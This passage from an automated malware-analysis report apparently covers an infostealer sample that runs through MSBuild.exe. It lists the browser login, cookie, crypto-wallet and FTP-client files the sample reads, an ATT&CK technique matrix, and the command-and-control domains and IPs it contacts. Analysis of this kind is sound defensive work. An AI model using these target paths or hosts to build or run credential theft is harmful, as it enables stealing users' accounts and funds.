                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2951364094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        3
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory13
                        File and Directory Discovery
                        Remote Desktop Protocol31
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        3
                        Obfuscated Files or Information
                        Security Account Manager55
                        System Information Discovery
                        SMB/Windows Admin Shares1
                        Screen Capture
                        11
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        Login HookLogin Hook1
                        Software Packing
                        NTDS451
                        Security Software Discovery
                        Distributed Component Object Model2
                        Clipboard Data
                        4
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell
                        Network Logon ScriptNetwork Logon Script1
                        Timestomp
                        LSA Secrets241
                        Virtualization/Sandbox Evasion
                        SSHKeylogging115
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                        Virtualization/Sandbox Evasion
                        Proc Filesystem2
                        System Owner/User Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection
                        /etc/passwd and /etc/shadow1
                        System Network Configuration Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617747 Sample: wEY98gM1Jj.ps1 Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 63 dfreamwave.cyou 2->63 65 www.littlemoroccanthings.com 2->65 67 7 other IPs or domains 2->67 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 11 other signatures 2->85 12 powershell.exe 15 25 2->12         started        17 notepad.exe 5 2->17         started        signatures3 process4 dnsIp5 71 91.206.178.120, 49710, 49813, 5001 ARTNET2PL Poland 12->71 73 www.littlemoroccanthings.com 34.120.190.48, 443, 49712 GOOGLEUS United States 12->73 75 api.ipify.org 104.26.12.205, 49709, 80 CLOUDFLARENETUS United States 12->75 53 C:\Windows\Temp\cmd.exe, PE32 12->53 dropped 97 Loading BitLocker PowerShell Module 12->97 99 Powershell drops PE file 12->99 19 cmd.exe 2 12->19         started        23 conhost.exe 12->23         started        file6 signatures7 process8 file9 41 C:\Users\user\AppData\Local\Temp\...\cmd.tmp, PE32 19->41 dropped 87 Multi AV Scanner detection for dropped file 19->87 25 cmd.tmp 3 14 19->25         started        signatures10 process11 file12 43 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 25->43 dropped 45 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 25->45 dropped 47 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 25->47 dropped 49 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 25->49 dropped 28 cmd.exe 2 25->28         started        process13 file14 51 C:\Users\user\AppData\Local\Temp\...\cmd.tmp, PE32 28->51 dropped 31 cmd.tmp 5 20 28->31         started        process15 file16 55 C:\Users\user\AppData\...\is-UDKGG.tmp, PE32+ 31->55 dropped 57 C:\Users\user\AppData\...\is-SBTFQ.tmp, PE32+ 31->57 dropped 59 C:\Users\user\AppData\...\is-JNHPI.tmp, PE32+ 31->59 dropped 61 13 other files (7 malicious) 31->61 dropped 34 OperaAirSetup.exe 2 31->34         started        process17 signatures18 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->77 37 MSBuild.exe 34->37         started        process19 dnsIp20 69 dfreamwave.cyou 172.67.172.121, 443, 49989, 49990 CLOUDFLARENETUS United States 37->69 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->89 91 Query firmware table information (likely to detect VMs) 37->91 93 Tries to harvest and steal ftp login credentials 37->93 95 2 other signatures 37->95 signatures21

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.